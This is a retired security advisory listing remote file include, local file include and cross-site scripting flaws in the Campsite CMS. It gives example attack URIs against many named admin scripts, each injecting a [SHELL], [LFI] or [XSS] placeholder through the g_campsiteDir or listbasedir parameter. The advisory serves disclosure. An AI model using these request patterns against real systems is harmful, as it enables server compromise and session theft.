|
RETIRED: Campsite Multiple Remote Input Validation Vulnerabilities
An attacker can exploit these issues via a browser. To exploit the cross-site scripting issue, the attacker must entice a user to follow a malicious link. The following example URIs are available: Remote file include: http://www.example.com/path/implementation/site/admin-files/ad_popup.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/camp_html.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/init_content.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/logout.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/menu.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/set-author.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/include/phorum_load.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/article_import/CommandProcessor.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/article_import/index.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/articles/add.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/articles/add_move.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/articles/autopublish.php?GLOBALS[g_campsiteDir]=[SHELL] http://www.example.com/path/implementation/site/admin-files/articles/autopublish_del.php?GLOBALS[g_campsiteDir]=[SHELL] Local file include: http://www.example.com/path/implementation/site/admin-files/ad.php?GLOBALS[g_campsiteDir]=[LFI] Cross-site scripting: http://www.example.com/path/implementation/site/admin-files/templates/list_dir.php?listbasedir=[XSS] |
|
|
Privacy Statement |
